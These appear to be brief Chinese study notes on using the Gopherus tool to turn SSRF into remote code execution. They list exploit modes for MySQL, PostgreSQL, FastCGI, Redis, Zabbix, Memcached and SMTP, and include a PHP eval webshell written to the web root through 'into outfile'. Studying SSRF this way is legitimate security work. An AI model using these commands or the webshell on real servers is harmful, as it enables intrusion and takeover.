gopherus使用
1. 下载:
GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
Gopherus工具的下载、使用-CSDN博客
2. 使用
用python2运行即可
记得对生成后payload下划线后面的部分进行url编码
2.1. 无密码的mysql
python2 gopherus.py --exploit mysql
root #用户名
select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/webshell.php';
参考案例 15.SSRF
2.2. 无密码的PostgreSQL
python2 gopherus.py --exploit pstgresql
2.3. fastcgi
gopherus --exploit fastcgi
2.4. Redis
gopherus --exploit redis
案例 15.SSRF
2.5. Zabbix
gopherus --exploit zabbix
2.6. 转储 Memcached 内容
gopherus --exploit pymemcache
gopherus --exploit rbmemcache
gopherus --exploit phpmemcache
gopherus --exploit dmpmemcache
2.7. SMTP
发送邮件
gopherus --exploit smtp